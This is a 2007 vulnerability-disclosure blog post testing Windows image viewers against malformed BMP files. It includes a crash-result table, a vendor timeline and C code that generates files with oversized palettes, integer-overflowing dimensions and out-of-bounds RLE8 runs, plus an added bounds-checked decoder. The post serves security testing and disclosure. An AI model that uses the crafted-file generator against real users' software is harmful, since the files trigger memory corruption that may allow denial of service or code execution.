Wednesday, April 4, 2007
Several Windows image viewers vulnerabilities
Table of contents
1. Introduction
2. Description of experiments
3. Image viewers
4. Experimental results
5. Concluding remarks
Appendix I - Timeline
Appendix II - A possible Win XP SP1 vulnerability
Appendix III - Source code
1. Introduction
The purpose of this post is to present a small study of the security of several popular Windows image viewers. When the security of image viewing software is discussed, web browsers are usually what is meant, since they are on the 'front lines' in an unsafe environment such as the Internet. There are, however, cases in which you may open a potentially dangerous image file with your favorite image viewer. Some examples are:
- If you click on the attachment in your email application
- If you click on a file in an archive (such as zip or rar) you downloaded or got by email
- If you open a file on a network shared folder
- If you download the file using p2p programs such as BitTorrent and eMule
2. Description of experiments
The experiments were conducted as follows: several malformed Windows bitmap (.bmp) files were specially crafted to cause buffer overflows in certain cases, if those cases are not handled properly by the opening application. Each of these images was opened with all of the viewers included in this study and any unexpected viewer behavior was noted. Here is the list of images used, with short descriptions.
paletteof1.bmp
This file defines a colormap larger than 256 entries (max allowed)
paletteof2.bmp
Similar to paletteof1.bmp, except the colormap is even larger
rle8of1.bmp
Uses run-length encoded blocks that extend beyond the image dimensions
rle8of2.bmp
Similar to rle8of1.bmp, except the erroneous RLE blocks start at a different offset
rle8of3.bmp
Uses xoffset and yoffset command in RLE encoded bmp in order to escape past image boundaries, then uses non-RLE encoded blocks to write data
rle8of4.bmp
Similar to rle8of3.bmp, except it doesn't use xoffset and yoffset, but still specifies enough non-RLE encoded blocks to escape the image boundaries
wh3intof.bmp
Image dimensions are set so that width*height*3 causes an integer overflow in 32-bit arithmetic, so the amount of memory allocated for the storage of the bitmap bits is smaller than the actual data provided
wh4intof.bmp
Image dimensions are set so that width*height*4 causes an integer overflow in 32-bit arithmetic, so the amount of memory allocated for the storage of the bitmap bits is smaller than the actual data provided
w3intof.bmp
Image dimensions are set so that width*3 causes an integer overflow in 32-bit arithmetic, so the amount of memory allocated for the storage of a single bitmap row is smaller than the actual data provided
w4intof.bmp
Image dimensions are set so that width*4 causes an integer overflow in 32-bit arithmetic, so the amount of memory allocated for the storage of a single bitmap row is smaller than the actual data provided
The code used to generate all of the above images is provided in Appendix III, so you can use it to test your favorite image viewer if it was not included here.
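The two failure classes above (header values that make the size arithmetic wrap, and RLE streams that walk outside the pixel buffer) are what a decoder has to reject before it allocates or writes anything. The following is an added example, written for this page and not taken from the original post or from any of the tested viewers; it validates the header fields with overflow-checked 32-bit arithmetic and decodes BI_RLE8 data with bounds checks. The `bmp_info` struct, the `MAX_PIXEL_BYTES` cap and the unpadded destination buffer are assumptions of the example, and the sample header values and RLE byte sequences in the comments are the ones the experiments section describes.

```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

/* The header fields that drive allocation: a constructed subset of BITMAPINFOHEADER. */
typedef struct {
    uint32_t width, height;   /* biWidth, biHeight (bottom-up images only) */
    uint16_t bitcount;        /* biBitCount: 1, 4, 8, 24 or 32 */
    uint32_t clrused;         /* biClrUsed: palette entries the file claims */
} bmp_info;

/* Cap on the decoded pixel buffer; an assumption of this example, not a BMP rule. */
#define MAX_PIXEL_BYTES (256u * 1024u * 1024u)

/* 32-bit multiply that reports wrap-around instead of silently truncating. */
static bool mul32(uint32_t a, uint32_t b, uint32_t *out) {
    if (a != 0 && b > UINT32_MAX / a) return false;
    *out = a * b;
    return true;
}

/* Returns 0 (and fills stride, pixel_bytes, palette_entries) for a sane header, -1 when
 * the header would lead to an undersized buffer (wrapped width*bpp or stride*height),
 * an unreasonably large one, or a palette with more than 2^bitcount entries. */
int bmp_check_header(const bmp_info *h, uint32_t *stride, uint32_t *pixel_bytes,
                     uint32_t *palette_entries) {
    uint32_t bits;
    if (h->width == 0 || h->height == 0) return -1;
    if (h->bitcount != 1 && h->bitcount != 4 && h->bitcount != 8 &&
        h->bitcount != 24 && h->bitcount != 32) return -1;
    uint32_t max_pal = h->bitcount <= 8 ? 1u << h->bitcount : 0;
    if (h->clrused > max_pal) return -1;                    /* paletteof1/2: 65535 or 1000000 > 256 */
    *palette_entries = h->clrused ? h->clrused : max_pal;
    if (!mul32(h->width, h->bitcount, &bits)) return -1;    /* w3intof/w4intof wrap here */
    if (bits > UINT32_MAX - 31) return -1;
    *stride = ((bits + 31) / 32) * 4;                        /* rows are padded to 4 bytes */
    if (!mul32(*stride, h->height, pixel_bytes)) return -1;  /* wh3intof wraps here */
    if (*pixel_bytes > MAX_PIXEL_BYTES) return -1;           /* wh4intof: about 3.2 GB, rejected by the cap */
    return 0;
}

/* Bounds-checked BI_RLE8 decoder into a width*height buffer (one byte per pixel, rows
 * bottom-up, no row padding in the destination to keep the example short).
 * Returns 0 on a complete image, -1 when a run, absolute block or delta would leave the
 * image (the rle8of1..4 cases) or the stream ends without an end-of-bitmap marker. */
int rle8_decode(const uint8_t *src, size_t srclen, uint32_t width, uint32_t height,
                uint8_t *dst) {
    uint32_t x = 0, y = 0;            /* invariant: x <= width, y <= height */
    size_t i = 0;
    while (i + 2 <= srclen) {
        uint8_t count = src[i], val = src[i + 1];
        i += 2;
        if (count > 0) {                                   /* encoded run: count pixels of val */
            if (y >= height || count > width - x) return -1;
            memset(dst + (size_t)y * width + x, val, count);
            x += count;
        } else if (val == 0) {                             /* end of line */
            x = 0;
            if (++y > height) return -1;
        } else if (val == 1) {                             /* end of bitmap */
            return 0;
        } else if (val == 2) {                             /* delta: skip (dx, dy) pixels */
            if (i + 2 > srclen) return -1;
            uint8_t dx = src[i], dy = src[i + 1];
            i += 2;
            if (dx > width - x || dy > height - y) return -1;
            x += dx;
            y += dy;
        } else {                                           /* absolute block: val literal pixels */
            size_t n = val, padded = (n + 1) & ~(size_t)1; /* literal bytes are word-aligned */
            if (i + padded > srclen) return -1;
            if (y >= height || n > width - x) return -1;
            memcpy(dst + (size_t)y * width + x, src + i, n);
            x += (uint32_t)n;
            i += padded;
        }
    }
    return -1;                                             /* truncated stream */
}
```

The checks are deliberately done in `uint32_t` so that they behave the same on a 64-bit host as on the 32-bit machines the experiments ran on; `w4intof` and `w3intof` are caught by the `width*bitcount` multiply, `wh3intof` by the `stride*height` multiply, and `wh4intof` (whose row-padded size happens to fit in 32 bits) by the size cap. In the decoder, every write is preceded by a comparison against the remaining room in the row and the remaining rows, so the delta in `rle8of3` and the 254-pixel absolute block in `rle8of4` are refused before `memset`/`memcpy` runs.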
3. Image viewers
Several popular image viewers were selected for this test. The most recent version of these viewers at the time of testing was used. The viewers are
ACDSee 9.0 Photo Manager
IrfanView 3.99
FastStone Image Viewer 2.9
4. Experimental results
Test system: Windows XP SP2 on Mobile AMD Sempron 3000+, 512MB RAM
ACDSee 9.0 Photo Manager
w4intof.bmp - Application closes
ACDSee 9.0 Quick View
w3intof.bmp - Microsoft Visual C++ Runtime Library: Runtime Error
w4intof.bmp - Application crashes, Exception code 0xc0000005 (access violation)
IrfanView 3.99
rle8of3.bmp - Application crashes, Exception code 0xc0000005 (access violation)
rle8of4.bmp - Application crashes, The memory could not be "written" Application error
FastStone Image Viewer 2.9
wh3intof.bmp - Application window closes, however application keeps running in the background consuming 100% of CPU resource
wh4intof.bmp - Application closes
5. Concluding remarks
All of the applications tested showed some sort of unexpected behavior on some of the images, demonstrating the need to further improve the security of products of this type. Accessing memory locations outside the allowed space, which is possible in some applications as demonstrated above, is especially dangerous since it has the potential to be exploited by a malicious attacker to execute arbitrary code on the unsuspecting user's computer. The other faults should also not be disregarded, since they could, in theory at least, be used in DoS attacks.
Since no actual code execution was analysed in detail, it is impossible to say from the above just what consequences any of these faults could have. I leave this analysis to the vendors of the applications tested.
Note that this small study only covers bmp images, so the presence of various other vulnerabilities is also possible (if not probable) in the code used to decode images in other formats.
All in all, best be careful next time you click on that image of Britney Spears' shaved ... head :-)
Appendix I - Timeline
Feb 15 2007 - Experiments made
Feb 18 2007 - 1st attempt to contact vendors
Feb 19 2007 - IrfanView programmer responded, said the code would be fixed in the upcoming version, due out soon
Feb 21 2007 - 2nd attempt to contact remaining vendors
Feb 23 2007 - Got response from ACD System support saying that they forwarded the information to the Quality Assurance and that they would contact me when they hear back from them. Never heard from them after that.
Apr 04 2007 - Release of this report
Note: It is possible that some of the bugs mentioned here were fixed quietly. I didn't check.
Appendix II - A possible Win XP SP1 vulnerability
On an old machine running Windows XP SP1 I encountered unusual behavior with one of my test images. When clicking on the w4intof.bmp in Windows Explorer (with the file details pane on the left of the window turned on) or viewing files as thumbnails in the containing folder, the Explorer crashes and Windows reports the exception code 0xc0000005, indicating a possible overflow. It is possible that Windows Explorer in SP1 too suffers from this kind of vulnerability. However I only had that one machine with SP1 installed and on the machines with other Windows versions (such as XP SP2) I didn't encounter any unusual behavior. I wrote to Microsoft about this promptly after discovery. They responded that they no longer support XP SP1 and this is not something they would investigate for an out-of-support product.
Appendix III - Source code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The two-byte "BM" signature is written separately so that the rest of the file header
   can be a plain struct of 32-bit fields with no alignment padding. */
typedef struct {
    unsigned int bfSize;
    unsigned int bfReserved;
    unsigned int bfOffBits;
} BITMAPFILEHEADER;

typedef struct {
    unsigned int biSize;
    unsigned int biWidth;
    unsigned int biHeight;
    unsigned short biPlanes;
    unsigned short biBitCount;
    unsigned int biCompression;   /* 0 = BI_RGB (uncompressed), 1 = BI_RLE8 */
    unsigned int biSizeImage;
    unsigned int biXPelsPerMeter;
    unsigned int biYPelsPerMeter;
    unsigned int biClrUsed;
    unsigned int biClrImportant;
} BITMAPINFOHEADER;

/* Writes a .bmp with exactly the header values given. No consistency checks are made on
   purpose: the test images rely on headers that disagree with the data that follows them. */
void writebmp(const char *filename, unsigned long width, unsigned long height, unsigned int bpp,
              unsigned int compression, unsigned char *palette, long numpalettecolors,
              unsigned char *data, long numdatabytes) {
    unsigned char sig[2] = { 'B', 'M' };
    BITMAPFILEHEADER fileheader;
    BITMAPINFOHEADER infoheader;
    memset(&fileheader, 0, sizeof(BITMAPFILEHEADER));
    memset(&infoheader, 0, sizeof(BITMAPINFOHEADER));
    fileheader.bfSize = sizeof(sig) + sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + numpalettecolors*4 + numdatabytes;
    fileheader.bfOffBits = sizeof(sig) + sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + numpalettecolors*4;
    infoheader.biSize = 40;
    infoheader.biWidth = width;
    infoheader.biHeight = height;
    infoheader.biPlanes = 1;
    infoheader.biBitCount = bpp;
    infoheader.biCompression = compression;
    infoheader.biClrUsed = numpalettecolors;
    FILE *fp = fopen(filename, "wb");
    if (!fp) {
        perror(filename);
        return;
    }
    fwrite(sig, sizeof(sig), 1, fp);
    fwrite(&fileheader, sizeof(BITMAPFILEHEADER), 1, fp);
    fwrite(&infoheader, sizeof(BITMAPINFOHEADER), 1, fp);
    if (palette) fwrite(palette, numpalettecolors*4, 1, fp);
    fwrite(data, numdatabytes, 1, fp);
    fclose(fp);
}

int main(void) {
    /* buf holds zeroed palette and pixel data, buf2 the hand-built RLE8 streams */
    unsigned char *buf = (unsigned char *)malloc(4000000);
    unsigned char *buf2 = (unsigned char *)malloc(4000000);
    if (!buf || !buf2) return 1;
    memset(buf, 0, 4000000);
    memset(buf2, 0, 4000000);

    /* overflows specifying too large a palette (ok8bit.bmp is the well-formed control) */
    writebmp("ok8bit.bmp", 16, 16, 8, 0, buf, 256, buf, 16*16);
    writebmp("paletteof1.bmp", 16, 16, 8, 0, buf, 65535, buf, 16*16);
    writebmp("paletteof2.bmp", 16, 16, 8, 0, buf, 1000000, buf, 16*16);

    /* integer overflows with image dimensions (ok24bit.bmp is the well-formed control) */
    writebmp("ok24bit.bmp", 16, 16, 24, 0, NULL, 0, buf, 16*16*4);
    writebmp("wh4intof.bmp", 32769, 32768, 24, 0, NULL, 0, buf, 4000000);
    writebmp("wh3intof.bmp", 37838, 37838, 24, 0, NULL, 0, buf, 4000000);
    writebmp("w4intof.bmp", 1073741825, 1, 24, 0, NULL, 0, buf, 4000000);
    writebmp("w3intof.bmp", 1431655767, 1, 24, 0, NULL, 0, buf, 4000000);

    /* overflows with RLE encoded BMPs; each RLE pair is (count, value) */
    buf2[0] = 16;   /* one run of 16 pixels fills the single 16-pixel row exactly */
    buf2[1] = 0;
    writebmp("okRLE.bmp", 16, 1, 8, 1, buf, 256, buf2, 2);
    /* runs of 255 pixels on a 16-pixel-wide image */
    for (long i = 0; i < 500000; i++) {
        buf2[i*2] = 255;
        buf2[i*2+1] = 0;
    }
    writebmp("rle8of1.bmp", 16, 1, 8, 1, buf, 256, buf2, 1000000);
    /* same, but the first run is 15 pixels so the overlong runs start one pixel before the edge */
    buf2[0] = 15;
    buf2[1] = 0;
    for (long i = 1; i < 500000; i++) {
        buf2[i*2] = 255;
        buf2[i*2+1] = 0;
    }
    writebmp("rle8of2.bmp", 16, 1, 8, 1, buf, 256, buf2, 1000000);
    /* delta (0, 2, xoffset, yoffset) past the image edge, then 254-pixel absolute blocks */
    memset(buf2, 0, 4000000);
    buf2[0] = 0;
    buf2[1] = 2;
    buf2[2] = 255;
    buf2[3] = 0;
    for (long i = 4; i < 100000-1;) {
        buf2[i] = 0;
        buf2[i+1] = 254;
        i += 255;
    }
    writebmp("rle8of3.bmp", 16, 1, 8, 1, buf, 256, buf2, 1000000);
    /* 254-pixel absolute blocks only, no delta */
    memset(buf2, 0, 4000000);
    for (long i = 0; i < 100000-1;) {
        buf2[i] = 0;
        buf2[i+1] = 254;
        i += 255;
    }
    writebmp("rle8of4.bmp", 16, 1, 8, 1, buf, 256, buf2, 1000000);

    free(buf);
    free(buf2);
    return 0;
}